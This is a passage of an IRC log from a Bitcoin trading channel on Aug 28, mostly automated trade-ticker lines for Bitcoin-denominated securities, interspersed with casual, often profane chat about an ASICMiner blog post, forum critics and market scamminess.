02:38:31 [BTCTC] [LABCOIN] 25 @ 0.003499 = 0.0875 BTC [-] Aug 28 02:38:55 [HAVELOCK] [AM100] 5 @ 0.02372 = 0.1186 BTC [-] Aug 28 02:38:57 [HAVELOCK] [AM100] 19 @ 0.02371 = 0.4505 BTC [-] Aug 28 02:38:59 [HAVELOCK] [AM100] 10 @ 0.02371 = 0.2371 BTC [-] Aug 28 02:39:01 [HAVELOCK] [AM100] 1 @ 0.02371 BTC [-] Aug 28 02:39:03 [HAVELOCK] [AM100] 10 @ 0.023701 = 0.237 BTC [-] Aug 28 02:39:06 [HAVELOCK] [AM100] 20 @ 0.023701 = 0.474 BTC [-] Aug 28 02:39:08 [HAVELOCK] [AM100] 10 @ 0.02370001 = 0.237 BTC [-] Aug 28 02:39:10 [HAVELOCK] [AM100] 25 @ 0.0235 = 0.5875 BTC [-] Aug 28 02:39:59 [BTCTC] [ACTIVEMINING] 21 @ 0.0051 = 0.1071 BTC [-] Aug 28 02:40:01 [BTCTC] [ACTIVEMINING] 100 @ 0.00509 = 0.509 BTC [-] Aug 28 02:40:02 [BTCTC] [ACTIVEMINING] 1062 @ 0.00508 = 5.395 BTC [-] Aug 28 02:40:02 [BTCTC] [ACTIVEMINING] 10 @ 0.005077 = 0.0508 BTC [-] Aug 28 02:40:04 [BTCTC] [ACTIVEMINING] 1100 @ 0.005067 = 5.5737 BTC [-] Aug 28 02:40:05 [BTCTC] [ACTIVEMINING] 100 @ 0.005065 = 0.5065 BTC [-] Aug 28 02:40:06 [BTCTC] [ACTIVEMINING] 151 @ 0.005051 = 0.7627 BTC [-] Aug 28 02:40:07 [BTCTC] [ACTIVEMINING] 500 @ 0.00505 = 2.525 BTC [-] Aug 28 02:40:08 [BTCTC] [ACTIVEMINING] 500 @ 0.00505 = 2.525 BTC [-] Aug 28 02:40:09 [BTCTC] [ACTIVEMINING] 20 @ 0.005036 = 0.1007 BTC [-] Aug 28 02:40:10 [BTCTC] [ACTIVEMINING] 192 @ 0.00503 = 0.9658 BTC [-] Aug 28 02:40:12 [BTCTC] [ACTIVEMINING] 35 @ 0.005029 = 0.176 BTC [-] Aug 28 02:40:13 [BTCTC] [ACTIVEMINING] 78 @ 0.005028 = 0.3922 BTC [-] Aug 28 02:40:14 [BTCTC] [ACTIVEMINING] 91 @ 0.005027 = 0.4575 BTC [-] Aug 28 02:40:14 [BTCTC] [ACTIVEMINING] 282 @ 0.005025 = 1.4171 BTC [-] Aug 28 02:40:15 [BTCTC] [ACTIVEMINING] 40 @ 0.005022 = 0.2009 BTC [-] Aug 28 02:41:01 [BTCTC] [LABCOIN] 100 @ 0.003485 = 0.3485 BTC [-] Aug 28 02:41:03 [BTCTC] [LABCOIN] 100 @ 0.003465 = 0.3465 BTC [-] Aug 28 02:41:04 [BTCTC] [LABCOIN] 100 @ 0.003463 = 0.3463 BTC [-] Aug 28 02:41:05 [BTCTC] [LABCOIN] 635 @ 0.003462 = 2.1984 BTC [-] Aug 28 02:41:06 [HAVELOCK] [AM100] 7 @ 0.0231 = 0.1617 BTC [-] Aug 28 02:41:09 [BTCTC] [LABCOIN] 500 @ 0.003417 = 1.7085 BTC [-] Aug 28 02:41:19 [HAVELOCK] [AM100] 29 @ 0.0227 = 0.6583 BTC [-] Aug 28 02:42:01 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] Aug 28 02:42:03 [BTCTC] [ASICMINER-PT] 4 @ 2.459 = 9.836 BTC [-] Aug 28 02:42:04 [BTCTC] [ASICMINER-PT] 1 @ 2.453 BTC [-] Aug 28 02:42:06 [BTCTC] [ASICMINER-PT] 3 @ 2.453 = 7.359 BTC [-] Aug 28 02:42:07 [BTCTC] [ASICMINER-PT] 4 @ 2.452 = 9.808 BTC [-] Aug 28 02:42:08 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Aug 28 02:42:09 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [-] Aug 28 02:42:10 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [-] Aug 28 02:42:12 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Aug 28 02:42:13 [BTCTC] [ASICMINER-PT] 1 @ 2.425 BTC [-] Aug 28 02:42:14 [BTCTC] [ASICMINER-PT] 1 @ 2.424 BTC [-] Aug 28 02:42:15 [BTCTC] [ASICMINER-PT] 1 @ 2.422 BTC [-] Aug 28 02:42:19 [BTCTC] [COGNITIVE] 1 @ 0.3401 BTC [+] Aug 28 02:42:40 [BTCTC] [ASICMINER-PT] 1 @ 2.422 BTC [-] Aug 28 02:42:42 [BTCTC] [ASICMINER-PT] 2 @ 2.421 = 4.842 BTC [-] Aug 28 02:42:43 [BTCTC] [ASICMINER-PT] 5 @ 2.42 = 12.1 BTC [-] Aug 28 02:42:44 [BTCTC] [ASICMINER-PT] 3 @ 2.415 = 7.245 BTC [-] Aug 28 02:42:45 [BTCTC] [ASICMINER-PT] 1 @ 2.413 BTC [-] Aug 28 02:42:47 [BTCTC] [ASICMINER-PT] 2 @ 2.412 = 4.824 BTC [-] Aug 28 02:42:48 [BTCTC] [ASICMINER-PT] 1 @ 2.412 BTC [-] Aug 28 02:42:49 [BTCTC] [ASICMINER-PT] 2 @ 2.412 = 4.824 BTC [-] Aug 28 02:42:50 [BTCTC] [ASICMINER-PT] 5 @ 2.412 = 12.06 BTC [-] Aug 28 02:42:51 [BTCTC] [ASICMINER-PT] 2 @ 2.525 = 5.05 BTC [+] Aug 28 02:42:52 [BTCTC] [ASICMINER-PT] 2 @ 2.547 = 5.094 BTC [+] Aug 28 02:42:53 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [+] Aug 28 02:43:04 mircea_popescu: heh, your article posted in AM thread, crash ensues Aug 28 02:43:31 oh and people that bought in at 5btc disagree with you Aug 28 02:43:36 [HAVELOCK] [AM1] 1 @ 2.276 BTC [-] Aug 28 02:43:40 how odd Aug 28 02:44:15 [HAVELOCK] [AM100] 15 @ 0.02271 = 0.3407 BTC [+] Aug 28 02:44:17 [HAVELOCK] [AM100] 11 @ 0.0227 = 0.2497 BTC [-] Aug 28 02:44:20 [HAVELOCK] [AM100] 49 @ 0.02259 = 1.1069 BTC [-] Aug 28 02:44:23 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] Aug 28 02:44:25 [BTCTC] [ASICMINER-PT] 4 @ 2.51 = 10.04 BTC [+] Aug 28 02:45:02 i thought it was moreover supportive if anything Aug 28 02:45:20 [BTCTC] [LABCOIN] 7 @ 0.003493 = 0.0245 BTC [+] Aug 28 02:45:22 [BTCTC] [LABCOIN] 7 @ 0.003495 = 0.0245 BTC [+] Aug 28 02:45:22 [BTCTC] [LABCOIN] 25 @ 0.003499 = 0.0875 BTC [+] Aug 28 02:45:24 [BTCTC] [LABCOIN] 78 @ 0.0035 = 0.273 BTC [+] Aug 28 02:45:39 [MPEX] [S.MPOE] 6950 @ 0.00087183 = 6.0592 BTC [-] Aug 28 02:45:41 [MPEX] [S.MPOE] 1550 @ 0.00087005 = 1.3486 BTC [-] Aug 28 02:46:01 i thought the article was a def a kinder side Aug 28 02:46:30 a melancholy respect Aug 28 02:46:31 [HAVELOCK] [AM100] 1 @ 0.0248 BTC [+] Aug 28 02:46:38 [BTCTC] [LABCOIN] 4 @ 0.003497 = 0.014 BTC [-] Aug 28 02:46:44 yes, its quite bad - Aug 28 02:47:40 [BTCTC] [LABCOIN] 1 @ 0.003421 BTC [-] Aug 28 02:47:59 GoldenWings91, murfshake and superduh concur Aug 28 02:48:10 in other news i just broke eulora's economy for the fifth fucking time Aug 28 02:48:25 why are computors so fuckin dumb anyway Aug 28 02:48:26 LOL, romerun thinks its too long to read Aug 28 02:49:23 sigh Aug 28 02:50:21 how's anyone supposed to make a point these days when every other idiot is too busy doing the same! Aug 28 02:50:53 ThickAsThieves i direct you to http://trilema.com/2013/fried-chicken/#comment-94800 which is kind of cheezy. Aug 28 02:51:28 nice Aug 28 02:53:00 [BTCTC] [BASIC-MINING] 1 @ 0.2106 BTC [+] Aug 28 02:53:15 it is a problem. how are we to even understand each other when every idiot out there is using the same words to fuck things up. Aug 28 02:58:09 "MPex is completely irrelevant to everyone except the poor souls who bought into it." Aug 28 02:58:20 revelation! Aug 28 02:58:46 [BTCTC] [ASICMINER-PT] 1 @ 2.416 BTC [-] Aug 28 02:58:47 [BTCTC] [ASICMINER-PT] 2 @ 2.413 = 4.826 BTC [-] Aug 28 02:58:50 another one: https://bitcointalk.org/index.php?topic=125629.msg3022210#msg3022210 Aug 28 02:59:03 I make points therefore points must be made about me Aug 28 02:59:30 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [+] Aug 28 02:59:31 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [+] Aug 28 02:59:33 [BTCTC] [ASICMINER-PT] 5 @ 2.51 = 12.55 BTC [+] Aug 28 03:00:03 http://trilema.com/2013/the-analysis-of-a-failure-asicminer/#comment-94804 Aug 28 03:00:06 The analysis of a failure : Asicminer pe Trilema - Un blog de Mircea Popescu. Aug 28 03:00:07 lotta derp about nothing. Aug 28 03:00:44 "Also before even considering having a legitimate exchange, there must be legitimate securities. Forcing the exchange to adhere to rigorous standards without first forcing the securities to adhere to standards makes no sense. " Aug 28 03:00:45 herp. Aug 28 03:00:50 its futile to explain anything to these people, its way better to just call them idiots and move on, they will think you are the idiot in either way but in the latter case you also get some pleasure Aug 28 03:01:00 kakobrekla welcome to the dark side. Aug 28 03:01:08 he's workin on me Aug 28 03:01:31 well for one i admire your blatant disregard for your own time. Aug 28 03:01:56 maybe one day i'll be less pussy and more dark, for now there is some naiveté left Aug 28 03:02:12 it takes all kinds i guess Aug 28 03:02:36 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002645 BTC [+] Aug 28 03:02:50 "Mircea Popescu is a narcissistic windbag. Stop giving him your attention." Aug 28 03:03:22 why do p[eople keeop saying that anyway ? Aug 28 03:03:29 cuz you so mean Aug 28 03:03:32 [HAVELOCK] [CFIG] 5 @ 0.185 = 0.925 BTC [-] Aug 28 03:03:46 i mean gypsy i can sorta get, the child porn thing is by now how americans say "Very very bad" Aug 28 03:03:58 but isn't calling someone a narcissist more like a compliment ? Aug 28 03:04:11 to a narcissist, surely Aug 28 03:04:13 ;) Aug 28 03:04:20 i mean to the general population. Aug 28 03:04:29 it's in there, yeah Aug 28 03:04:33 who exactly they admire, professional navel grazers rightj ? Aug 28 03:04:42 not that much love for odysseus these days Aug 28 03:05:59 [HAVELOCK] [AM100] 2 @ 0.02259001 = 0.0452 BTC [-] Aug 28 03:06:01 [HAVELOCK] [AM100] 5 @ 0.02259 = 0.113 BTC [-] Aug 28 03:06:03 [HAVELOCK] [AM100] 5 @ 0.0221 = 0.1105 BTC [-] Aug 28 03:06:05 [HAVELOCK] [AM100] 1 @ 0.022 BTC [-] Aug 28 03:06:07 [HAVELOCK] [AM100] 100 @ 0.0219 = 2.19 BTC [-] Aug 28 03:06:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.0226 = 0.113 BTC [-] Aug 28 03:06:24 [BTCTC] [TAT.ASICMINER] 27 @ 0.0225 = 0.6075 BTC [-] Aug 28 03:06:25 [BTCTC] [TAT.ASICMINER] 9 @ 0.02212 = 0.1991 BTC [-] Aug 28 03:06:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.02211 = 0.1106 BTC [-] Aug 28 03:06:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02211 BTC [-] Aug 28 03:06:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.02211 = 0.2211 BTC [-] Aug 28 03:06:30 [BTCTC] [TAT.ASICMINER] 30 @ 0.0221 = 0.663 BTC [-] Aug 28 03:06:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.0221 = 0.221 BTC [-] Aug 28 03:06:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.02204 = 0.1984 BTC [-] Aug 28 03:06:32 [BTCTC] [TAT.ASICMINER] 16 @ 0.02203 = 0.3525 BTC [-] Aug 28 03:06:33 [BTCTC] [TAT.ASICMINER] 95 @ 0.02202 = 2.0919 BTC [-] Aug 28 03:06:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.022 = 1.1 BTC [-] Aug 28 03:06:35 [BTCTC] [TAT.ASICMINER] 80 @ 0.022 = 1.76 BTC [-] Aug 28 03:06:36 [BTCTC] [TAT.ASICMINER] 100 @ 0.022 = 2.2 BTC [-] Aug 28 03:06:54 as a narcissist, I take it as a compliment Aug 28 03:07:10 anyone not being a narcissist hates themselves anyway Aug 28 03:08:26 respect and guilt does not exist for these, only jealousy and threat Aug 28 03:08:40 viva la liberacion dos internetos!!1 Aug 28 03:08:42 welcome to bitcoin Aug 28 03:09:07 somewhat related, http://askthepast.blogspot.ro/2013/06/how-to-impress-girls-at-dance-1530.html Aug 28 03:09:08 a marketplace made up of many differnt types of sick, demented animals Aug 28 03:09:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02366 BTC [+] Aug 28 03:10:11 advice or 2030 probly too Aug 28 03:10:24 you know, if you asked me to give on the spot the one trait that i think most promising for the future of bitcoin, Aug 28 03:10:44 i would say it's the universal disgust and borderline loathing market participants feel for everyone else involved. Aug 28 03:10:56 it smacks me of very successful stuff, like the early us stock market. Aug 28 03:11:22 pretty much everyone in florence despised everyone else, to the degree they had to bring outside mayors all the time Aug 28 03:11:52 heh Aug 28 03:12:12 [BTCTC] [BTC-TRADING-PT] 1 @ 1.06 BTC [-] Aug 28 03:13:30 https://bitcointalk.org/index.php?topic=99497.msg3022356#msg3022356 a board member responds Aug 28 03:13:35 ASICMINER: Entering the Future of ASIC Mining by Inventing It Aug 28 03:13:40 i will tell you one thing Jutarul is a beast Aug 28 03:13:49 by far my favorite board member Aug 28 03:14:20 [BTCTC] [DMS.MINING] 2 @ 0.003549 = 0.0071 BTC [-] Aug 28 03:14:38 a beast, how ? Aug 28 03:14:44 don't tell me you've done the deed together. Aug 28 03:15:07 intelligent Aug 28 03:15:16 has great perspective Aug 28 03:15:19 02:14.29 ( Diablo-D3 ) this is why I decided to not relist DMC on mpex, he even offered to waive the fee Aug 28 03:15:19 etc Aug 28 03:15:21 WHAT? Aug 28 03:15:24 lol Aug 28 03:15:32 MP offered that? Aug 28 03:16:02 O_o Aug 28 03:16:18 this must be some sort of parallel reality. Aug 28 03:17:08 ThickAsThieves: of course he's a beast, he's a fucking dark templar. (look at profile pic) Aug 28 03:17:30 He's already said it. Aug 28 03:19:13 I wouldn't mind, Diablo-D3. Aug 28 03:19:42 [BTCTC] [BTC-BOND] 24 @ 0.009995 = 0.2399 BTC [-] Aug 28 03:23:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02366 BTC [+] Aug 28 03:23:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02398 BTC [+] Aug 28 03:24:02 [BTCTC] [BTC-TRADING-PT] 3 @ 1.06 = 3.18 BTC [-] Aug 28 03:26:33 [BTCTC] [LABCOIN] 2000 @ 0.003476 = 6.952 BTC [+] Aug 28 03:28:38 [BTCTC] [ASICMINER-PT] 1 @ 2.421 BTC [-] Aug 28 03:28:39 [BTCTC] [ASICMINER-PT] 4 @ 2.42 = 9.68 BTC [-] Aug 28 03:30:56 i think asicminer is a scam i get the feeling friedcat isn't his real name Aug 28 03:31:32 .......... Aug 28 03:32:06 [MPEX] [S.MPOE] 4352 @ 0.00087255 = 3.7973 BTC [+] Aug 28 03:32:07 [MPEX] [S.MPOE] 4631 @ 0.00087669 = 4.06 BTC [+] Aug 28 03:32:08 [BTCTC] [DMS.SELLING] 200 @ 0.01223 = 2.446 BTC [-] Aug 28 03:32:13 lol Aug 28 03:35:25 fuck the US Aug 28 03:35:34 and their shitty war-fuled currency Aug 28 03:35:38 +1 Aug 28 03:36:02 so mad at this bullshit Aug 28 03:36:04 [HAVELOCK] [AM100] 16 @ 0.021502 = 0.344 BTC [-] Aug 28 03:36:05 Tried to stop them getting a hold . but alas i did Aug 28 03:36:14 *died Aug 28 03:37:01 am i missing some context or is this nonsequitur day ? Aug 28 03:37:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005341 = 0.0534 BTC [+] Aug 28 03:37:50 nah im just venting Aug 28 03:37:57 https://images.4chan.org/pol/src/1377650187165.png Aug 28 03:38:18 a yeah, syria's gettin' ugly. Aug 28 03:38:20 speaking of which, Aug 28 03:38:27 who cares about syria Aug 28 03:38:29 ;;later tell benkay http://bitbet.us/bet/522/israel-bombarded-from-syria/ Aug 28 03:38:30 The operation succeeded. Aug 28 03:38:33 asicminer maaaaan Aug 28 03:38:54 [BTCTC] [ASICMINER-PT] 1 @ 2.423 BTC [+] Aug 28 03:38:55 [BTCTC] [ASICMINER-PT] 1 @ 2.422 BTC [-] Aug 28 03:38:57 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [-] Aug 28 03:38:58 [BTCTC] [ASICMINER-PT] 3 @ 2.413 = 7.239 BTC [-] Aug 28 03:38:59 [BTCTC] [ASICMINER-PT] 5 @ 2.412 = 12.06 BTC [-] Aug 28 03:39:00 [BTCTC] [ASICMINER-PT] 3 @ 2.412 = 7.236 BTC [-] Aug 28 03:39:02 [BTCTC] [ASICMINER-PT] 7 @ 2.411 = 16.877 BTC [-] Aug 28 03:39:03 [BTCTC] [ASICMINER-PT] 9 @ 2.41 = 21.69 BTC [-] Aug 28 03:39:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.02349 = 0.1409 BTC [-] Aug 28 03:39:21 mircea_popescu: WAR PROFITEER Aug 28 03:39:22 lol Aug 28 03:39:42 hm? Aug 28 03:39:43 [BTCTC] [TAT.ASICMINER] 24 @ 0.0235 = 0.564 BTC [+] Aug 28 03:39:52 python is really popular Aug 28 03:40:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.02398 = 0.048 BTC [+] Aug 28 03:40:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02399 = 0.096 BTC [+] Aug 28 03:40:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02449 = 0.2449 BTC [+] Aug 28 03:40:06 4 million and counting Aug 28 03:40:10 lolololololololol Aug 28 03:40:25 thought its popular with data science stuff etc Aug 28 03:40:37 [BTCTC] [TAT.ASICMINER] 61 @ 0.0245 = 1.4945 BTC [+] Aug 28 03:40:52 https://images.4chan.org/pol/src/1377650348425.png Aug 28 03:41:14 dude srsly. 4chan is for porn Aug 28 03:42:05 MP is a hologram Aug 28 03:42:51 Diablo-D3 a bunch of people on this chan has Aug 28 03:44:34 [BTCTC] [LABCOIN] 5 @ 0.003499 = 0.0175 BTC [+] Aug 28 03:45:05 you are getting spammy Aug 28 03:45:50 [BTCTC] [ASICMINER-PT] 1 @ 2.424 BTC [+] Aug 28 03:46:24 [BTCTC] [LABCOIN] 5 @ 0.003499 = 0.0175 BTC [+] Aug 28 03:46:31 [BTCTC] [TAT.ASICMINER] 35 @ 0.02221 = 0.7774 BTC [-] Aug 28 03:46:58 spammy? Aug 28 03:46:59 or scammy? Aug 28 03:47:44 [BTCTC] [LABCOIN] 22 @ 0.0035 = 0.077 BTC [+] Aug 28 03:48:09 he doesnt stand out since scammyness is on a rise back to the glbse levels Aug 28 03:48:10 [BTCTC] [LABCOIN] 85 @ 0.003563 = 0.3029 BTC [+] Aug 28 03:48:52 [BTCTC] [LABCOIN] 74 @ 0.003576 = 0.2646 BTC [+] Aug 28 03:48:53 [BTCTC] [LABCOIN] 96 @ 0.003577 = 0.3434 BTC [+] Aug 28 03:49:17 [BTCTC] [LABCOIN] 3 @ 0.003577 = 0.0107 BTC [+] Aug 28 03:49:22 crime doesn't pay in bitcoin world Aug 28 03:49:24 it's too much work Aug 28 03:49:34 just go rob a baby of his trust fund by gun point Aug 28 03:50:20 [BTCTC] [LABCOIN] 3 @ 0.003575 = 0.0107 BTC [-] Aug 28 03:50:26 [BTCTC] [TAT.ASICMINER] 7 @ 0.02349 = 0.1644 BTC [+] Aug 28 03:51:26 [BTCTC] [ACTIVEMINING] 15 @ 0.005022 = 0.0753 BTC [-] Aug 28 03:52:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02349 BTC [+] Aug 28 03:52:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.0235 = 0.094 BTC [+] Aug 28 03:52:22 [BTCTC] [ACTIVEMINING] 87 @ 0.005021 = 0.4368 BTC [-] Aug 28 03:52:24 [BTCTC] [ACTIVEMINING] 48 @ 0.005021 = 0.241 BTC [-] Aug 28 03:52:35 [BTCTC] [BTC-GROWTH] 6 @ 0.1004 = 0.6024 BTC [+] Aug 28 03:52:36 [BTCTC] [BTC-GROWTH] 14 @ 0.1005 = 1.407 BTC [+] Aug 28 03:52:54 [BTCTC] [LABCOIN] 200 @ 0.003572 = 0.7144 BTC [-] Aug 28 03:53:09 .d Aug 28 03:53:09 65750060.14908 | Next Diff in 1455 blocks | Estimated Change: 12.6393% in 8d 19h 50m 2s Aug 28 03:53:11 [BTCTC] [LABCOIN] 10 @ 0.003572 = 0.0357 BTC [-] Aug 28 03:54:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.0235 = 0.0705 BTC [+] Aug 28 03:54:42 [BTCTC] [ASICMINER-PT] 12 @ 2.49 = 29.88 BTC [+] Aug 28 03:54:43 [BTCTC] [ASICMINER-PT] 2 @ 2.496 = 4.992 BTC [+] Aug 28 03:54:44 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Aug 28 03:54:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Aug 28 03:55:58 [BTCTC] [LABCOIN] 100 @ 0.00357 = 0.357 BTC [-] Aug 28 03:56:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02448 BTC [+] Aug 28 03:56:46 [MPEX] [S.MPOE] 5691 @ 0.00087669 = 4.9892 BTC [+] Aug 28 03:56:55 [MPEX] [S.MPOE] 2309 @ 0.0008786 = 2.0287 BTC [+] Aug 28 03:57:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.02448 = 0.1469 BTC [+] Aug 28 03:59:56 [HAVELOCK] [XBOND] 217 @ 0.00113457 = 0.2462 BTC [-] Aug 28 04:00:16 [HAVELOCK] [XBOND] 23 @ 0.00113456 = 0.0261 BTC [-] Aug 28 04:00:52 [BTCTC] [ASICMINER-PT] 2 @ 2.421 = 4.842 BTC [-] Aug 28 04:00:54 [BTCTC] [ASICMINER-PT] 1 @ 2.421 BTC [-] Aug 28 04:01:26 [BTCTC] [LABCOIN] 11 @ 0.0035 = 0.0385 BTC [-] Aug 28 04:01:27 [BTCTC] [ASICMINER-PT] 12 @ 2.42 = 29.04 BTC [-] Aug 28 04:01:29 [BTCTC] [LABCOIN] 615 @ 0.003499 = 2.1519 BTC [-] Aug 28 04:01:53 [BTCTC] [ASICMINER-PT] 1 @ 2.416 BTC [-] Aug 28 04:02:22 [BTCTC] [ASICMINER-PT] 15 @ 2.415 = 36.225 BTC [-] Aug 28 04:02:53 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Aug 28 04:02:55 [BTCTC] [ASICMINER-PT] 4 @ 2.41 = 9.64 BTC [-] Aug 28 04:03:18 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Aug 28 04:03:19 [BTCTC] [ASICMINER-PT] 3 @ 2.4 = 7.2 BTC [-] Aug 28 04:03:20 [BTCTC] [ASICMINER-PT] 15 @ 2.4 = 36 BTC [-] Aug 28 04:03:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Aug 28 04:05:22 [BTCTC] [DMS.MINING] 20 @ 0.003347 = 0.0669 BTC [-] Aug 28 04:05:24 [BTCTC] [DMS.MINING] 5 @ 0.003346 = 0.0167 BTC [-] Aug 28 04:05:25 [BTCTC] [DMS.MINING] 32 @ 0.003346 = 0.1071 BTC [-] Aug 28 04:05:26 [BTCTC] [DMS.MINING] 168 @ 0.003346 = 0.5621 BTC [-] Aug 28 04:07:08 [BTCTC] [LABCOIN] 85 @ 0.003444 = 0.2927 BTC [-] Aug 28 04:07:51 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [+] Aug 28 04:08:45 [BTCTC] [TAT.ASICMINER] 9 @ 0.02448 = 0.2203 BTC [+] Aug 28 04:12:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02448 = 0.0734 BTC [+] Aug 28 04:13:37 [BTCTC] [LABCOIN] 88 @ 0.003441 = 0.3028 BTC [-] Aug 28 04:13:38 [BTCTC] [LABCOIN] 912 @ 0.00344 = 3.1373 BTC [-] Aug 28 04:16:08 [BTCTC] [LABCOIN] 22 @ 0.003441 = 0.0757 BTC [+] Aug 28 04:16:36 HKAOJSNCUUEWNNSUUN Aug 28 04:18:26 [BTCTC] [ASICMINER-PT] 1 @ 2.458 BTC [-] Aug 28 04:18:26 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [+] Aug 28 04:18:37 [BTCTC] [LABCOIN] 88 @ 0.00344 = 0.3027 BTC [-] Aug 28 04:18:53 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] Aug 28 04:19:02 [BTCTC] [LABCOIN] 450 @ 0.003421 = 1.5395 BTC [-] Aug 28 04:19:03 [BTCTC] [LABCOIN] 110 @ 0.00342 = 0.3762 BTC [-] Aug 28 04:19:05 [BTCTC] [LABCOIN] 5000 @ 0.003417 = 17.085 BTC [-] Aug 28 04:19:06 [BTCTC] [LABCOIN] 4638 @ 0.003415 = 15.8388 BTC [-] Aug 28 04:19:24 [BTCTC] [LABCOIN] 362 @ 0.003415 = 1.2362 BTC [-] Aug 28 04:19:26 [BTCTC] [LABCOIN] 10 @ 0.003407 = 0.0341 BTC [-] Aug 28 04:19:27 [BTCTC] [LABCOIN] 500 @ 0.003401 = 1.7005 BTC [-] Aug 28 04:19:27 [BTCTC] [LABCOIN] 3606 @ 0.003401 = 12.264 BTC [-] Aug 28 04:19:45 [BTCTC] [LABCOIN] 1394 @ 0.003401 = 4.741 BTC [-] Aug 28 04:19:47 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [-] Aug 28 04:19:48 [BTCTC] [LABCOIN] 880 @ 0.0034 = 2.992 BTC [-] Aug 28 04:19:49 [BTCTC] [LABCOIN] 750 @ 0.0034 = 2.55 BTC [-] Aug 28 04:20:49 [BTCTC] [LABCOIN] 8 @ 0.003399 = 0.0272 BTC [-] Aug 28 04:20:50 [BTCTC] [LABCOIN] 810 @ 0.003399 = 2.7532 BTC [-] Aug 28 04:22:20 [BTCTC] [LABCOIN] 700 @ 0.003401 = 2.3807 BTC [+] Aug 28 04:22:22 [BTCTC] [LABCOIN] 4190 @ 0.003399 = 14.2418 BTC [-] Aug 28 04:22:23 [BTCTC] [LABCOIN] 100 @ 0.003371 = 0.3371 BTC [-] Aug 28 04:22:24 [BTCTC] [LABCOIN] 936 @ 0.00337 = 3.1543 BTC [-] Aug 28 04:22:25 [BTCTC] [LABCOIN] 728 @ 0.00337 = 2.4534 BTC [-] Aug 28 04:22:26 [BTCTC] [LABCOIN] 20 @ 0.00337 = 0.0674 BTC [-] Aug 28 04:22:27 [BTCTC] [LABCOIN] 1486 @ 0.003358 = 4.99 BTC [-] Aug 28 04:22:28 [BTCTC] [LABCOIN] 100 @ 0.003358 = 0.3358 BTC [-] Aug 28 04:22:29 [BTCTC] [LABCOIN] 200 @ 0.003354 = 0.6708 BTC [-] Aug 28 04:22:30 [BTCTC] [LABCOIN] 300 @ 0.00335 = 1.005 BTC [-] Aug 28 04:22:32 [BTCTC] [LABCOIN] 1372 @ 0.003348 = 4.5935 BTC [-] Aug 28 04:22:33 [BTCTC] [LABCOIN] 5000 @ 0.003347 = 16.735 BTC [-] Aug 28 04:22:34 [BTCTC] [LABCOIN] 5000 @ 0.003347 = 16.735 BTC [-] Aug 28 04:22:35 [BTCTC] [LABCOIN] 10 @ 0.003344 = 0.0334 BTC [-] Aug 28 04:22:36 [BTCTC] [LABCOIN] 100 @ 0.003338 = 0.3338 BTC [-] Aug 28 04:22:36 [BTCTC] [LABCOIN] 880 @ 0.003334 = 2.9339 BTC [-] Aug 28 04:22:37 [BTCTC] [LABCOIN] 200 @ 0.003333 = 0.6666 BTC [-] Aug 28 04:22:38 [BTCTC] [LABCOIN] 5000 @ 0.003333 = 16.665 BTC [-] Aug 28 04:22:39 [BTCTC] [LABCOIN] 1500 @ 0.003325 = 4.9875 BTC [-] Aug 28 04:22:40 [BTCTC] [LABCOIN] 100 @ 0.003317 = 0.3317 BTC [-] Aug 28 04:22:41 [BTCTC] [LABCOIN] 1000 @ 0.003315 = 3.315 BTC [-] Aug 28 04:22:43 [BTCTC] [LABCOIN] 200 @ 0.003311 = 0.6622 BTC [-] Aug 28 04:22:44 [BTCTC] [LABCOIN] 1414 @ 0.00331 = 4.6803 BTC [-] Aug 28 04:22:54 [BTCTC] [COGNITIVE] 5 @ 0.34 = 1.7 BTC [-] Aug 28 04:22:55 [BTCTC] [COGNITIVE] 27 @ 0.3361 = 9.0747 BTC [-] Aug 28 04:23:12 [BTCTC] [LABCOIN] 62 @ 0.003449 = 0.2138 BTC [+] Aug 28 04:25:21 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Aug 28 04:25:22 [BTCTC] [ASICMINER-PT] 12 @ 2.49 = 29.88 BTC [+] Aug 28 04:26:48 [BTCTC] [COGNITIVE] 1 @ 0.336 BTC [-] Aug 28 04:27:13 [BTCTC] [COGNITIVE] 4 @ 0.336 = 1.344 BTC [-] Aug 28 04:27:43 [BTCTC] [COGNITIVE] 5 @ 0.322 = 1.61 BTC [-] Aug 28 04:28:47 [BTCTC] [LABCOIN] 200 @ 0.00332 = 0.664 BTC [-] Aug 28 